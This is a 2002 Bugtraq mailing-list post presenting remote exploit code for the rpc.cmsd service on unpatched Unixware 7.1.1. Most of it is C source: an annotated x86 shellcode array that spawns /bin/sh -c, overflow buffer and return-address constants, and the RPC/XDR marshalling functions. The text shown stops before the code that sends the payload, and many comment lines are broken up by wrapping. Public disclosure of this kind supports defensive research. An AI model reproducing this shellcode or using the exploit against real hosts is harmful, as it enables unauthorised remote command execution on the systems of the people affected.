Unixware 7.1.1 rpc.cmsd remote exploit code.
Date: 10 Jan 2002 04:40:54 -0000
From: "jGgM." <jggm@mail.com>
To: bugtraq@securityfocus.com
Subject: Unixware 7.1.1 rpc.cmsd remote exploit code.
Hi, I'm jGgM.
Here is unixware 7.1.1 rpc.cmsd remote exploit code.
This is old bug. ( Currently patched....maybe.. )
This works only not -patched Unixware 7.1.1.
--------------------------------------
Korean security Info.. by jGgM.
http://www.forsecure.com/
http://www.netemperor.com/
--------------------------------------
/*
* Unixware 7.x rpc.cmsd exploit by jGgM
* http://www.netemperor.com/en/
* EMail: jggm@mail.com
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21
#define BUFFER_SIZE 1036
#define SHELL_START 1024
#define RET_LENGTH 12
#define ADJUST 100
#define NOP 0x90
#define LEN 68
char shell[] =
/* 0 */ "\xeb\x3d" /* jmp springboard
[2000]*/
/* syscall: [2000]*/
/* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0
[2000]*/
/* 9 */ "\xc3" /* ret [2000]*/
/* start: [2000]*/
/* 10 */ "\x5e" /* popl %esi
[2000]*/
/* 11 */ "\x31\xc0" /* xor %eax,%eax
[2000]*/
/* 13 */ "\x89\x46\xbf" /* movl %eax,-
0x41(%esi) */
/* 16 */ "\x88\x46\xc4" /* movb %al,-0x3c
(%esi) */
/* 19 */ "\x89\x46\x0c" /* movl %eax,0xc
(%esi) */
/* 22 */ "\x88\x46\x17" /* movb %al,0x17
(%esi) */
/* 25 */ "\x88\x46\x1a" /* movb %al,0x1a
(%esi) */
/* 28 */ "\x88\x46\xff" /* movb %al,0x??
(%esi) */
/* execve: [2000]*/
/* 31 */ "\x31\xc0" /* xor %eax,%eax
[2000]*/
/* 33 */ "\x50" /* pushl %eax
[2000]*/
/* 34 */ "\x56" /* pushl %esi
[2000]*/
/* 35 */ "\x8d\x5e\x10" /* leal 0x10(%
esi),%ebx */
/* 38 */ "\x89\x1e" /* movl %ebx,(%
esi)[2000]*/
/* 40 */ "\x53" /* pushl %ebx
[2000]*/
/* 41 */ "\x8d\x5e\x18" /* leal 0x18(%
esi),%ebx */
/* 44 */ "\x89\x5e\x04" /* movl %ebx,0x4
(%esi) */
/* 47 */ "\x8d\x5e\x1b" /* leal 0x1b(%
esi),%ebx */
/* 50 */ "\x89\x5e\x08" /* movl %ebx,0x8
(%esi) */
/* 53 */ "\xb0\x3b" /* movb $0x3b,%al
[2000]*/
/* 55 */ "\xe8\xc6\xff\xff\xff" /* call syscall
[2000]*/
/* 60 */ "\x83\xc4\x0c" /* addl $0xc,%
esp [2000]*/
/* springboard: [2000]*/
/* 63 */ "\xe8\xc6\xff\xff\xff" /* call start
[2000]*/
/* data: [2000]*/
/* 68 */ "\xff\xff\xff\xff" /* DATA [2000]
*/
/* 72 */ "\xff\xff\xff\xff" /* DATA [2000]
*/
/* 76 */ "\xff\xff\xff\xff" /* DATA [2000]
*/
/* 80 */ "\xff\xff\xff\xff" /* DATA [2000]
*/
/* 84 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /*
DATA [2000]*/
/* 92 */ "\x2d\x63\xff"; /* DATA
[2000]*/
struct cm_send {
char *s1;
char *s2;
};
struct cm_reply {
int i;
};
bool_t xdr_cm_send(XDR *xdrs, struct cm_send
*objp)
{
if(!xdr_wrapstring(xdrs, &objp->s1))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->s2))
return (FALSE);
return (TRUE);
}
bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply
*objp)
{
if(!xdr_int(xdrs, &objp->i))
return (FALSE);
return (TRUE);
}
